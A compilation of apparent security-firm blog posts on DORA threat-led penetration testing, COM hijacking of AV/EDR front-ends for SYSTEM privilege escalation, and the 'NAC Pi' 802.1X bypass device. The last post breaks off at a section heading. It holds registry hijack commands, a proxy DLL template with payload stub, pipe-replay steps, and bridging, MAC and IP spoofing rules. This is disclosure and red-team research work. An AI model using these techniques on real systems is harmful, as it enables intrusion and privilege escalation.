Essentially, TLPT is nothing new. The Deutsche Bundesbank has been accompanying the execution of TIBER-DE projects since 2020. TIBER-DE is the German implementation of TIBER-EU. TIBER stands for Threat Intelligence-based Ethical Red Teaming and thus represents a threat-driven form of red-team assessment.

A red-team assessment is a holistic approach to reviewing IT and information security. Different attack vectors and scenarios are examined at the technical, procedural, and organizational levels. This review is carried out by simulating targeted attacks using current and relevant attack techniques.

With TIBER, the selection of attack scenarios and of the tactics, techniques, and procedures (TTPs) is driven by company-specific threat intelligence. In concrete terms, this means that attacker groups and their respective TTPs are simulated specifically on the basis of the affected company's current threat situation, thereby testing the company's resilience (see the information provided by the Deutsche Bundesbank). TIBER is accordingly a specialized, threat-led form of red-team assessment and is available as a concrete framework for project execution (see Deutsche Bundesbank).

According to BaFin, a TLPT under DORA builds on this framework and intensifies the cooperation between BaFin and the Deutsche Bundesbank (see the information provided by BaFin). Per BaFin, only "minor details in the operational execution of a TLPT compared to the established TIBER-DE framework" change (see Deutsche Bundesbank). In short, a TLPT is essentially a TIBER test.

As with TIBER-DE projects, the Deutsche Bundesbank is involved in the entire execution of a TLPT. It supports the execution, monitors its conformity, and finally attests to it. There is no way around involving the Deutsche Bundesbank.

Even this compact description suggests that a TLPT is not an everyday penetration test. The following BaFin graphic illustrates this:

Figure 1: TLPTs as rare but specialized penetration tests

Michael Brügge

Managing Consultant

Specifically, DORA requires a TLPT to be performed at regular intervals of three years. Companies that have already voluntarily undergone an official TIBER-DE assessment in the past can have it credited accordingly (see BaFin).

How does a TLPT proceed?

Various actors are involved in conducting a TLPT. These teams and their roles are shown in the following BaFin graphic:

Figure 2: Actors involved in a TLPT

Since a TLPT builds on TIBER-DE, the course of a TLPT project can be explained well using TIBER-DE. The project is fundamentally divided into the following three phases:

  • Preparation phase
  • Test phase
  • Closure phase

Each of these phases is in turn divided into several sub-steps and involves different actors. The following BaFin graphic outlines the entire course of a TLPT:

Figure 3: Actors involved in a TLPT

As Figure 3 shows, the competent financial supervisory authority identifies the affected financial companies, sets the test frequency, and validates the test scope. The affected companies are then responsible for selecting suitable service providers for the execution. Deliberately, this is not just one provider: TIBER-DE requires a strict separation between the threat-intelligence provider and the red-team provider, meaning that gathering the information and performing the red-team assessment must explicitly not be done by the same group of people. While it is in principle possible to choose a single provider for both, the Deutsche Bundesbank clearly recommends selecting specialized providers for each role. Incidentally, there is no list of attested TLPT or TIBER providers for Germany so far (see BaFin). Under certain conditions, DORA, unlike TIBER-DE, permits internal execution (see Deutsche Bundesbank).

In the test phase, information is first gathered and threat-led attack scenarios are derived. For this purpose, both the general threat situation for the financial sector and company-specific threats are considered. If it turns out, for example, that a certain threat actor is currently increasingly attacking German financial institutions and distributing malware via vishing attacks, this constitutes a valid, threat-led scenario for the TLPT. Together with the company, the threat-intelligence and red-team providers, and the Deutsche Bundesbank, several scenarios are then selected and defined in concrete terms. These form the starting position for the red team and determine the tactics, techniques, and procedures of the simulated attackers. The entire test phase spans roughly 18 weeks, of which roughly 12 weeks are spent executing the attacks.

The project closes with the reporting. Importantly, not only the red team but also the blue team of the affected company writes down its findings in a structured manner. In subsequent replay and purple team workshops, the entire test is recapitulated once more and open "what if" questions can be clarified. In our experience, these workshops are always highly instructive for everyone involved and, alongside the final reports, yield deep insights into technical, procedural, and organizational deficiencies. Such a test is also a good opportunity to test and train the blue team's detection and response capabilities. All identified deficiencies are finally addressed in a remediation plan and assigned to owners. In the end, the Deutsche Bundesbank attests that the TLPT was carried out in conformity with the requirements, and roughly three years later the whole cycle starts over.

If you are required to carry out a TLPT, feel free to get in touch with us. As a professional provider of red team assessments and penetration tests, we also offer the compliant execution of TLPTs and TIBER tests. Further information is available at https://cirosec.de/leistungen/red-team-assessments/.

It does not always have to be TLPT or TIBER

If your company is obliged to carry out a TLPT, there is no way around a compliant implementation. In many cases, however, financial sector companies are not subject to the mandatory requirement at all. In that case, a more compact form of red team assessment may be the better choice.

With TIBER and TLPT, BaFin and the Deutsche Bundesbank have created an important and concrete framework for conducting holistic, threat-led penetration tests, and the concrete requirements allow these projects to be carried out in a structured and comprehensive manner. However, this also entails a correspondingly high effort, both in the number of person-days required for the external execution by a threat intelligence and a red team provider and in the internal contributions the company itself must make.

cirosec has already been closely involved in the execution of TIBER tests in the past and therefore not only has the necessary skills as a professional red team provider but also knows the effort involved. Especially if a company is not subject to the mandatory requirement or has not yet gained experience with classic red team assessments, a more compact approach can be helpful. From countless conversations with our customers, we know that not every company has the capacity or the necessary maturity level for a project of this kind. So it does not always have to be TLPT or TIBER.

Nevertheless, we consider the approach of a holistic, threat-led penetration test enormously important. Only in this way can interdependencies and overarching risks be identified and subsequently addressed. As an established provider of professional red team assessments and penetration tests, we always aim to offer our customers proposals tailored to their concrete needs. For this reason, there is no single one-size-fits-all red team assessment at cirosec. Instead, we work with our customers to determine a suitable overall package that pursues their motivation and project goals, fits their budget, and matches their maturity level. Especially for companies that may be subject to mandatory TLPTs in the future, more compact formats are a good opportunity to gain initial experience with holistic, threat-led penetration tests.

So feel free to contact us if you are looking for a competent partner for individual red team assessments or a standardized TLPT.


The Key to COMpromise – Pwning AVs and EDRs by Hijacking COM Interfaces, Part 1

January 15, 2025 – Author: Alain Rödel and Kolja Grassmann

Introduction

Antivirus (AV) and Endpoint Detection and Response (EDR) products are critical in securing systems in enterprise environments or personal setups. These products are designed to protect devices, but their widespread use – particularly in enterprises – means vulnerabilities in these products can significantly impact overall security. We previously analyzed Wazuh and found vulnerabilities that would have allowed lateral movement in the organization’s network. In this series, we will discuss how we identified vulnerabilities in multiple security products that could, in theory, allow privilege escalation to SYSTEM on millions of devices, assuming initial access was gained. We will introduce the general design of the targeted security products to give you some background information on the mechanisms that allowed us to escalate our privileges.

Technical Background

All the security products we examined include a user interface, which typically allows users to perform actions such as triggering filesystem scans, initiating updates, or modifying settings like excluded files. For example, setting an exclusion should require high privileges to prevent malware from excluding itself from scans. However, the user interface usually operates in the context of the user executing it. Especially in an enterprise setting, this user often lacks high privileges, as granting such privileges would violate good security practices.

How does a low-privileged user change settings?

Since the user interface cannot directly perform privileged actions, such as setting exclusions, a separate system process with higher privileges is required to execute these changes on behalf of the user interface. In our analysis, we will refer to:

  • The user interface as the front-end process.
  • The highly privileged system process as the back-end process.

To coordinate actions, the front-end process must communicate with the back-end process. Depending on the product, this communication occurs through named pipes, Remote Procedure Calls (RPC), or Component Object Model (COM) interfaces. Across all products we examined, the back-end process ran with SYSTEM privileges.

Security risks in back-end communication

A natural concern arises: Could malware abuse this communication to perform privileged actions? If malicious software could directly interact with the back-end process, it could exploit this pathway to, for example, modify the registry or other sensitive settings.

To mitigate this, security products typically verify that requests to the back-end process originate from a trusted source. For example, they might check the signature of the executable initiating the communication.

However, this safeguard is insufficient on its own, as Windows lacks strict boundaries between processes running under the same user account. A process can read or write to the memory of other processes in the same user context. It can even execute code within those processes. As a result, malware could potentially hijack a trusted process to abuse its connection with the back-end process.

Protections against code injection

To address this risk, security vendors implement additional protections to secure the front-end process:

  • Filter Drivers: These intercept system calls and prevent handles with privileges that could allow code injection from being created for the front-end process. This blocks many common code injection techniques, which often rely on acquiring such handles.
  • DLL Allowlist Validation: During our testing, we observed measures that verify the location of loaded DLLs against an allowlist to prevent loading of untrusted DLLs.

These defenses significantly reduce the risk of untrusted code injection.

Communication between front-end and back-end processes

The diagram below illustrates the components involved in the communication between front-end and back-end processes:

Figure 1: Overview of the components involved in typical communication between different processes of an EDR

Communication with the back-end process remains an attractive attack surface. For example, attackers could exploit it to trigger privileged actions, such as modifying the registry, from an unprivileged context. Manufacturers are aware of these risks and have implemented safeguards to prevent direct communication with the back-end process. However, previously discovered vulnerabilities, such as those in Avast [1,2], have demonstrated that bypassing these protections is possible.

Exploiting back-end communication

To abuse back-end communication, an attacker must first establish a way to interact with the back-end process. There are two primary approaches:

  • Exploit validation logic flaws: Identify weaknesses in the logic used by the back-end process to verify that requests originate from the front-end process.
  • Inject code into the front-end process: Attackers can indirectly communicate with the back-end process by executing code within the trusted front-end process.

In our research, we pursued the second approach. Using COM hijacking, we successfully injected code into the front-end process, enabling us to communicate with the back-end process from within the trusted front-end.

COM hijacking

Component Object Model (COM) interfaces provide additional functionality to applications, offering a framework for interprocess communication and object reuse. For instance, Windows Runtime (WinRT) is implemented based on COM. A key advantage of COM is its abstraction: developers using COM interfaces do not need to understand the underlying implementation, which could be written in another language, executed in a separate process, or even reside on a remote server in the case of Distributed COM (DCOM).

Some COM interfaces implement their functionality through DLLs that are dynamically loaded into the calling process when the interface is invoked. Hijacking such a COM interface allows injecting a custom DLL into the calling process, enabling code execution within the process’s context.

To use a COM interface, the developer invokes CoCreateInstance with a GUID, which triggers a search for the matching COM class and returns a COM object if the interface is found. The following graphic gives a high-level overview of how this could work for the TaskScheduler interface:

Figure 2: Example COM lookup of the ITaskScheduler COM object
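In code, the lookup boils down to a single call. Here is a minimal sketch (using the Task Scheduler 2.0 interface from taskschd.h as an example; error handling shortened for brevity):

#include <windows.h>
#include <taskschd.h>

#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "uuid.lib")

int main(void) {
    // Initialize COM for this thread
    CoInitializeEx(NULL, COINIT_MULTITHREADED);

    // CoCreateInstance looks up CLSID_TaskScheduler in the registry
    // (HKCU first, then HKLM) and loads the implementing server
    ITaskService *pService = NULL;
    HRESULT hr = CoCreateInstance(CLSID_TaskScheduler, NULL,
                                  CLSCTX_INPROC_SERVER,
                                  IID_ITaskService, (void **)&pService);
    if (SUCCEEDED(hr)) {
        // ... use the COM object ...
        pService->Release();
    }

    CoUninitialize();
    return 0;
}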

The core idea of COM hijacking is to exploit the registry’s search order for COM interface definitions. When a COM interface is accessed, the system first looks for its definition in the HKEY_CURRENT_USER (HKCU) registry hive before checking the HKEY_LOCAL_MACHINE (HKLM) hive. If the COM interface uses a DLL to provide its functionality, the registry entry will include the path to the implementing DLL. Since the HKCU hive belongs to the current user, it can be modified by processes running with that user’s privileges. This means that any process running in the user’s context — including the front-end process of an EDR product running in the context of our unprivileged user — will prioritize COM definitions in the HKCU hive and stop searching once a match is found. The following diagram shows the registry accesses before and after a COM hijack:

Figure 3: Overview of the involved components

COM hijacking is most often discussed as a persistence technique. For instance, attackers could hijack a COM interface known to be invoked, ensuring their payload is executed. In our research, however, we employed COM hijacking differently. Rather than using it solely for persistence, we specifically targeted the front-end process of EDR products to load a custom DLL. This allowed us to execute code within the process context, leveraging the elevated privileges of the back-end process during communication. Interestingly, this approach proved effective against many EDR products. There was similar research in the past, which abused COM hijacking to bypass the self-defense of similar products [5]. Furthermore, James Forshaw previously demonstrated its use against VirtualBox [3].

In all the EDR products we examined, COM interfaces were used in the front-end process. Most of these interfaces were located under the HKLM hive, so there was no need to overwrite any data. However, overwriting an interface in the HKCU hive would also have been possible.

After hijacking a COM interface, every invocation of the targeted interface in the user’s context would trigger our hijacked COM interface. For our purposes, this enabled us to load our custom DLL into the front-end process whenever specific actions were performed, such as opening a file dialogue in the user interface.

Now that we have discussed COM hijacking in theory, the next question is how we identified COM interfaces of interest within the front-end process.

Identifying a hijackable COM interface

The initial step in all the vulnerabilities we discovered involved achieving code execution in a front-end process via COM hijacking. As this was similar across all the products we analyzed, we will outline the general process here instead of repeating it for each specific product.

Each COM lookup is performed via a GUID that maps to a CLSID (Class ID). We can therefore hunt for those GUIDs and figure out which COM objects are used by the product.

For each product, the first task was to identify a COM Interface used by the front-end process.

This required considering several factors:

  • When is the COM interface invoked?
    • During the start of the UI
    • When entering a specific menu
  • Is the COM interface used by other processes?
    • To avoid unintended consequences (e.g., disrupting explorer.exe), we ensured the interface was unique to the target process or could be safely used in parallel.

We used Process Monitor from the Sysinternals suite to identify relevant COM interfaces. We first identified the process we wanted to target. Then, we used a filter to view only events triggered by this process. Next, we created a filter for registry events where the path contained CLSID and InProcServer32, indicating that the process tries to load a DLL used for a COM interface.

The following screenshot demonstrates how explorer.exe queries the relevant registry keys, providing insight into the COM interfaces it accesses:

Figure 4: Accesses to COM interfaces by explorer.exe

After identifying a potential COM interface, the next step was to confirm if the front-end process loaded the referenced DLL. We monitored file interactions and filtered paths containing the DLL name to do this. If the DLL was loaded, it would trigger a load event for the DLL specified in the registry:

Figure 5: Loading a DLL related to COM

Once a suitable interface was identified, the next step was to hijack it.

Hijacking a COM interface

One registry key we targeted across multiple products was:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}

This COM interface loads dataxchange.dll into the calling process.
To hijack it, we first exported the corresponding registry key:

reg export "HKLM\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}" .\export.reg /reg:64

Then, we opened the exported file export.reg in a text editor and changed the paths to HKEY_CURRENT_USER. We also changed the file path to point to our custom DLL:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}]

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32]
@="C:\\poc\\dataxchange.dll"
"ThreadingModel"="Both"

Next, we imported the modified registry export:

reg import .\export.reg /reg:64

With these modifications, all calls to this COM interface from the context of our unprivileged user would invoke our custom DLL. This might lead to problems with other processes, so we should remove the hijack when we are done with exploitation.
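Cleaning up afterwards is as simple as deleting the key again, for example:

reg delete "HKCU\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}" /f /reg:64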

Our DLL must export the functions the original COM DLL would expose to ensure smooth operation. This can be achieved by proxying calls to the original DLL using a template such as:

#include <windows.h>
#include <combaseapi.h>

// Export DllGetClassObject without needing a .def file
#pragma comment( linker, "/export:DllGetClassObject" )

#define ORIGINAL_COM_DLL_PATH "C:\\Windows\\System32\\dataxchange.dll"

void Go(void) {
    // Our payload
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    return TRUE;
}

typedef HRESULT(WINAPI *tDllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID *ppv);

STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID FAR *ppv) {
    // Start our payload
    Go();

    // Load the original DLL and proxy the function call to it
    HMODULE hOrigDLL = LoadLibrary(ORIGINAL_COM_DLL_PATH);
    if (!hOrigDLL)
        return S_FALSE;

    tDllGetClassObject pDllGetClassObject =
        (tDllGetClassObject)GetProcAddress(hOrigDLL, "DllGetClassObject");
    if (!pDllGetClassObject)
        return S_FALSE;

    return pDllGetClassObject(rclsid, riid, ppv);
}

At this point, we achieved code execution in the context of the targeted product. So, the next step was to analyze the communication between the front-end and back-end processes for the specific product to get an idea of how to abuse this primitive.

Named pipe communication

Named pipes are a common method for communication between a server and one or more clients. They are accessible using a unique name (as the name suggests) and often serve as a communication channel between security products’ front-end and back-end processes.

Figure 6: Typical Named Pipe Communication via the WinAPI

We found that the easiest way to find out if a product uses named pipes was to use IONinja’s Pipe Monitor feature. For this, you click “New Session”, select “Pipe Monitor” and enable “Run as administrator”. You can click the “Capture” button in the top-right corner to start capturing named pipe traffic:

Figure 7: Starting IONinja
Figure 8: Listening to named pipes with IONinja

With this, you can interact with the product’s user interface to generate pipe traffic and watch for captured named pipe traffic that corresponds to the interaction. In our experience, there should be little named pipe communication on a vanilla system, so identifying the relevant communication should be straightforward if you have installed the product on a dedicated system.

Having identified the communication in IONinja, we have a pipe name and a process that opens the named pipe or writes to it. We now need to identify the logic. For this, we can look for strings beginning with \\.\pipe\, used when creating a named pipe. The logic that interacts with the named pipe will likely reference this string. You will also see calls to the CreateNamedPipe and ConnectNamedPipe functions.
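For completeness, talking to such a pipe from our own code requires only a handful of WinAPI calls. The following minimal sketch (the pipe name and message bytes are placeholders, not taken from any of the actual products) connects to a pipe, writes a previously recorded message, and reads the response:

#include <windows.h>
#include <stdio.h>

int main(void) {
    // Hypothetical pipe name for illustration purposes
    HANDLE hPipe = CreateFileA("\\\\.\\pipe\\ExampleBackendPipe",
                               GENERIC_READ | GENERIC_WRITE,
                               0, NULL, OPEN_EXISTING, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to open pipe: %lu\n", GetLastError());
        return 1;
    }

    // A message captured earlier, e.g., with a pipe monitor (placeholder bytes)
    BYTE recordedMessage[] = { 0x00, 0x01, 0x02 };
    DWORD bytesWritten = 0;
    WriteFile(hPipe, recordedMessage, sizeof(recordedMessage), &bytesWritten, NULL);

    // Read the back-end's response
    BYTE response[1024];
    DWORD bytesRead = 0;
    ReadFile(hPipe, response, sizeof(response), &bytesRead, NULL);

    CloseHandle(hPipe);
    return 0;
}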

For our initial target, all of this turned out to be unnecessary: When capturing data over a named pipe, we observed plaintext communication, including what appeared to be a registry key:

Figure 9: Registry path in named pipe traffic

The next section will detail how we exploited this communication to gain high privileges.

Replaying a recorded message

As shown in the screenshot above, the traffic on the named pipe for our first target contained a registry path and was not obfuscated. This message was sent every time we opened the front-end process.

Using Process Monitor, we observed that the back-end process, running as SYSTEM, accessed the registry key. This seemed promising, as writing a registry key as SYSTEM could lead to privilege escalation…

To test this theory, we implemented the following steps:

1. Prepare the Payload: We wrote a small program and converted it into shellcode using donut (https://github.com/TheWover/donut).

2. Inject the Payload: Using the DLL loaded earlier via COM hijacking, we injected the shellcode into the process. In the shellcode, we unloaded the DLL after a short sleep and then sent the modified data. This approach bypassed logic in the target process that appeared to validate loaded DLLs. Although we didn’t confirm whether bypassing this validation was essential, avoiding an unsigned DLL during communication helped minimize suspicion.

3. Initial Testing: To confirm our ability to replay the message, we modified the registry path in the recorded message. The modified path was successfully written to the registry:

Figure 10: Modified registry key written

We discovered that our ability to write registry keys was restricted to locations under the manufacturer’s designated registry path. This limitation prevented us from writing keys like RunOnce, which could enable privilege escalation.

However, we identified a promising registry key named Application Path. This key pointed to an application folder under C:\Program Files (x86). By modifying this path to one writable by us, we hypothesized that any high-privilege process loading from this path could execute our files, granting high privileges.

So, we modified the message again, choosing a path that would fit into the message without modifying any offsets. After injecting our DLL into the process, we replayed the modified message to overwrite the Application Path. Following a system restart, we observed that one of the privileged EDR processes executed files from the modified Application Path. By placing our payload in this directory, we successfully gained SYSTEM privileges:

Figure 11: Processes being started from modified path as SYSTEM

Conclusion

This blog post explored the attack surface associated with the interaction between an AV/EDR’s front-end and back-end processes. Key takeaways are:

  • Breaking Trust Assumptions: Using COM hijacking, we demonstrated how the assumption that the front-end process is inherently trusted can be exploited.
  • Finding Hijackable Interfaces: We described our methodology for identifying and hijacking COM interfaces.
  • Privilege Escalation via Named Pipes: We detailed how one target product communicated via named pipes and how replaying recorded messages enabled us to escalate privileges to SYSTEM.

In the next blog post, we will explore reversing RPC via COM and present a more complex exploit to achieve SYSTEM privileges by targeting another security product.

This article was written as part of joint research with Neodyme.


Inside the NAC Pi:
The journey of how we built our own all-in-one device to bypass NAC (including 802.1X)

July 5, 2024 – Author: Leon Schmidt

Network access control ("NAC" for short) comprises measures for protecting physical and wireless networks. These measures act as gatekeepers for clients that want to connect to the network. Without them, connecting a device to the network is as easy as plugging it into any Ethernet port and … you’re in!

MAC filtering simply hardcodes the MAC addresses that are allowed to connect to the network. While this is easy to bypass with MAC spoofing, it still requires an attacker to take extra steps to access the network.

NAC based on 802.1X, on the other hand, forces the connecting client to authenticate itself cryptographically against a trusted server. The server then decides whether the client is allowed to access the network. This is quite complex, so let’s look at how it works first.

Basics of 802.1X NAC

One way to implement NAC is by using a protocol called IEEE 802.1X, which is a port-based network access control (PNAC). This means that the boundary is the network switch port (the so-called “authenticator”) to which the client (the so-called “supplicant”) is directly connected. Packets originating from a client not able to authenticate must not pass this port. The authenticator in turn talks to the so-called “authentication server” via the RADIUS protocol (or any other AAA protocol), and the server eventually decides whether the supplicant is allowed to enter the network. This is where the actual authentication procedure takes place.

802.1X defines the encapsulation of the Extensible Authentication Protocol (EAP) over wired and 802.11 wireless networks, which is known as "EAP over LAN", or "EAPOL" for short. This is the protocol used between the supplicant and the authenticator, the latter of which transmits the authentication data of the former. EAPOL is transmitted on OSI layer 2, so the supplicant doesn’t need an IP address to use it. The authenticator then takes the EAP portion of the EAPOL packet and transmits it to the authentication server via RADIUS.

EAP packets being wrapped in EAPOL and RADIUS:

Figure 1: https://en.wikipedia.org/wiki/IEEE_802.1X#/media/File:802.1X_wired_protocols.png

So far so good. We now have an authentication layer in our network, so what’s next? Well … nothing. 802.1X in its original form only adds authentication to the otherwise unprotected network. There are extensions to it, but all of them are optional and not considered here. For more information, see "Possible mitigation scenarios in which the NAC Pi doesn’t work" below.

Reasons to bypass MAC filtering and 802.1X NAC

The most obvious reason for an attacker of any kind to bypass network protections is, surprise, surprise, gaining access to the network. An attacker being allowed at the switch port often means that they can obtain a network IP address via DHCP, which allows them to communicate with all devices on their LAN segment and often also beyond it. This opens many doors for attacks like ARP spoofing, packet sniffing, denial of service and so on – against all reachable devices in the network.

But there is more. An assumption is made especially in 802.1X-secured networks which is not made in unprotected networks: The clients in the network can be trusted, as they have authenticated themselves cryptographically, right? Well yes, but this statement is only true until some adversary bypasses this authentication. This would allow the attacker to spy on and act like a trusted client within the trusted network. Additionally, being physically “on the wire” between the supplicant and the authenticator might even allow for advanced techniques like relaying attacks, for example using the tool ntlmrelayx (https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py).

A little bit of theory and why NAC bypasses are possible

But how exactly can we bypass the 802.1X authentication process? Breaking it cryptographically is not a reasonable option, because state-of-the-art cryptography is used (at least most of the time). The other option is to bypass it physically by letting the supplicant do its authentication and somehow using the link in its already authenticated state.

There is a tool that does exactly this: Sitting in between a supplicant and an authenticator with the goal to let the supplicant authenticate itself and then injecting traffic into the authenticated link to effectively bypass 802.1X. The tool is called silentbridge and can be found on GitHub (https://github.com/s0lst1c3/silentbridge). It is meant to be run on a Linux device and creates a transparent Linux network bridge connecting supplicant, authenticator, and a side-channel interface (from where the traffic is injected).

In theory, we then just wait for the supplicant to authenticate itself to the network over the transparent bridge by forwarding the supplicant’s EAPOL frames to the authenticator. For security reasons, this forwarding is disabled by default in standard Linux network bridges (precisely to prevent attacks like this). In earlier versions of the Linux kernel, it was necessary to apply a kernel patch to reactivate EAPOL forwarding; today this can be done via the sysfs virtual file system. With the bridge configured to forward EAPOL frames, the attacker only needs to wait for the supplicant to complete the authentication process.
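On recent kernels, this amounts to setting the bridge’s group forwarding mask. EAPOL frames are addressed to the link-local group address 01:80:C2:00:00:03, which corresponds to bit 3 of the mask, so, assuming the bridge is named br0:

echo 8 > /sys/class/net/br0/bridge/group_fwd_mask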

Port-based NAC effectively uses the MAC address to identify the supplicant, meaning that all packets originating from this address are allowed to pass the NAC, which is also true for MAC filtering. The link state is also monitored to enforce reauthentication in the event of a link termination. So, the only thing we need to do now is to use IP- and MAC-based source NAT to rewrite the source address of all packets originating from our silentbridge device or its side-channel interface to match the supplicant. However, port-based NAC is strict enough that even a single packet with the wrong MAC address on an authorized port immediately closes the port again. We must therefore always ensure that packets are only sent once this NATing is fully set up. This is called “start dark” in silentbridge terminology and has the drawback that once the rogue device is introduced onto the link, the connection is interrupted for some seconds. Consequently, we need to make sure that the supplicant can reauthenticate itself in order to keep the link in an authenticated state.
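To give a feel for what this source NAT looks like, here is a rough sketch with made-up addresses and interface names; the rules silentbridge actually generates are more involved:

# Rewrite the IP source address of injected traffic to the supplicant's IP
iptables -t nat -A POSTROUTING -o br0 -j SNAT --to-source 192.168.1.50

# Rewrite the Ethernet source address to the supplicant's MAC on layer 2
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src 00:11:22:33:44:55 --snat-target ACCEPT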

The cool thing about this is that the actual technical implementation of the authentication process is completely irrelevant for this approach, as we do not intervene in it directly. We simply let the supplicant do its thing. We’ve tested the authentication protocols "PEAP-MSCHAPv2" and "EAP-TLS" from 802.1X-2004 as well as networks that don’t use 802.1X at all but might use MAC filtering. This means the procedure is applicable both to all variants of 802.1X-2004 and to MAC filtering. Nice!

All these things, and a few more to keep the bridge invisible in the network, are done by silentbridge. But we are still missing some vital information: In order to perform the source NAT, silentbridge needs to know which source address to use to overwrite those of the outgoing packets. Consequently, we must determine the IP and MAC address of the supplicant. Silentbridge also sets static ARP entries for the switch on which the authenticator runs and for the network’s gateway, so our own packets can be routed correctly. This is done manually in order to stay silent in the "start dark" stage. The authenticator ARP entry is required for EAPOL packets since they must reach the switch directly on layer 2. This means we also need to acquire the MAC addresses of our authenticator and gateway before starting the actual attack.

Finding these is a simple but time-consuming process if done manually, especially if you think of a red-teaming scenario, where you don’t have all the time in the world to spin up Wireshark first. We need a better approach for this…

Sticking it all together: Genesis of the NAC Pi

Ok, so we now have some knowledge of MAC filtering and 802.1X and a tool to bypass them, but we still need the required network information. Now, where do we start? We build a hardware appliance for it!

We have chosen the Raspberry Pi 4 B for this purpose. It’s small, can be powered with USB-C and is more than capable of handling packet bridging. We use USB-Ethernet adapters to add more physical interfaces to the Raspberry Pi. Software-wise, we have developed multiple scripts that instrument silentbridge to perform the 802.1X bypass fully automatically by doing the following steps:

  1. Detecting connected devices to confirm that bridging and injection via the side-channel interface is possible.
  2. Creating the transparent bridge with silentbridge without adding the side-channel yet.
  3. Preventing locally generated packets from leaving the NAC Pi (“start dark”) but leaving the bridging intact.
  4. Running a tcpdump on the bridge to collect the supplicant IP and MAC address as well as the switch and gateway MAC address (this is not as easy as it sounds).
  5. Adding the side-channel to the bridge and applying all iptables and arptables rules required for the source NAT.
  6. “Lifting the radio silence” created by the “start dark” action in step 3.

The end result: we can now inject traffic onto the authenticated link via the side-channel, and from the NAC Pi itself, by impersonating the authenticated supplicant!

Figure 2: The NAC Pi intercepting the secure 802.1X channel (illustration created by cirosec)

But we haven’t yet defined what the side-channel is. This is where the NAC Pi shines: it can be literally any device that can be represented as a Linux network interface. Currently, two possible side-channels are supported by our NAC Pi: a physical LAN device (like an attacker notebook) connected directly to it, or a device in an OpenVPN tunnel established via LTE to allow for remote injection.

Traffic injection methods: LAN and VPN over LTE

In LAN mode, the NAC Pi’s side-channel is a physical device connected to one of the USB-Ethernet adapters. This is the simplest way of injecting traffic but requires a dedicated device on site with custom network settings, as the side-channel network is a special subnet only used in LAN mode. For advanced scenarios, up to 13 additional devices can be connected to this subnet, e.g., by using a switch between the NAC Pi and its side-channel devices.

In LTE mode, the side-channel is a tunnel device. It belongs to an OpenVPN connection to one of our servers intended for NAC Pi traffic injection. The connection is established via an LTE modem connected to the NAC Pi. This way, the connection is not dropped by some corporate firewall that prevents outgoing VPN connections. One of our pentesters can now connect to the OpenVPN server from any device within our IP address range, routing all of its traffic to it. The server then routes the incoming traffic from the consultant back into the VPN tunnel established from the NAC Pi. It eventually reaches the tunnel device defined as the silentbridge side-channel.
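For reference, the client side of such a tunnel is unspectacular; a minimal OpenVPN client configuration of the kind a NAC Pi might use could look like this (server address and certificate files are placeholders):

client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert nacpi1.crt
key nacpi1.key
persist-key
persist-tun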

We also wanted to be able to deploy multiple NAC Pis at the same time. Each NAC Pi has been assigned an instance number that determines which private OpenVPN network it connects to. In addition, several OpenVPN configuration files have been created for the consultants, which are also assigned to a specific private network. The OpenVPN server routes the respective packets to the correct NAC Pi using policy-based routing, as can be seen in Figure 3. This way, a consultant can choose the NAC Pi into which they want to inject traffic remotely. In a large network, for example, several network segments or clients can be infiltrated simultaneously. Furthermore, several consultants can connect to one NAC Pi using the same OpenVPN configuration file to work in parallel, similar to LAN mode.

Figure 3: Policy-based routing on the VPN, allowing multiple NAC Pi instances and consultants to connect (illustration created by cirosec)
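Policy-based routing of this kind takes only a few lines on the VPN server. A hypothetical sketch for instance 1 (the interface and table names are made up):

# Packets arriving from consultants assigned to instance 1 are looked up in table 101
ip rule add iif tun-consultants1 lookup 101

# The default route of table 101 points into the VPN tunnel towards NAC Pi 1
ip route add default dev tun-nacpi1 table 101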

In both modes, the traffic-injecting side-channel device can target the NAC Pi directly via the subnet’s first available host address. This is required for DNS redirecting (more on this later) and to connect to it via SSH.

The side-channel mode in which the NAC Pi operates is determined at boot time depending on the devices connected to it. It uses udev rules combining USB port numbers and USB vendor/product IDs to determine whether an LTE modem is connected and whether, and how many, USB-Ethernet adapters are attached. The latter is required so the NAC Pi operator knows which USB ports the adapters need to be attached to. The same udev rules then create named interfaces from those adapters, which are in turn given to silentbridge. The boot script also automatically establishes the VPN connection if an LTE modem is detected.
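Such a udev rule could look like the following hypothetical example, which gives the USB-Ethernet adapter on a specific USB port a fixed interface name (the port path and vendor ID are illustrative):

# /etc/udev/rules.d/70-nacpi.rules
ACTION=="add", SUBSYSTEM=="net", KERNELS=="1-1.2", ATTRS{idVendor}=="0b95", NAME="side0"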

A little fact in passing: For all networks created by the NAC Pi, we use addresses within the reserved carrier-grade NAT subnet 100.64.0.0/10. But why not use the private IPv4 ranges instead? We observed that using a network like 10.0.0.0/8 runs the risk of colliding with addresses within the target network. At first, we used IPv4 link-local addresses (the ones you get when you don’t have a DHCP server in your network, but your interface is configured to use one), but they had a major drawback: On Linux, those addresses are not routable because, well, they are link-local. This meant that we couldn’t use Linux devices as side-channel devices. So, we switched to the carrier-grade NAT subnet. It is almost never used in networks meant for ordinary clients, while still being globally routable (which we do not need in our case, because we only use it for NAT). So, a perfect match for us!

But wait … there is more!

It would be a shame having a hardware appliance that bypasses NACs but does nothing more than this. Over time, our NAC Pi has evolved into a complex network attack framework supplying advanced DNS features to the operator, allowing for easy on-link credential sniffing and even providing an endpoint for Wi-Fi keyloggers. But one thing at a time.

DNS redirection service

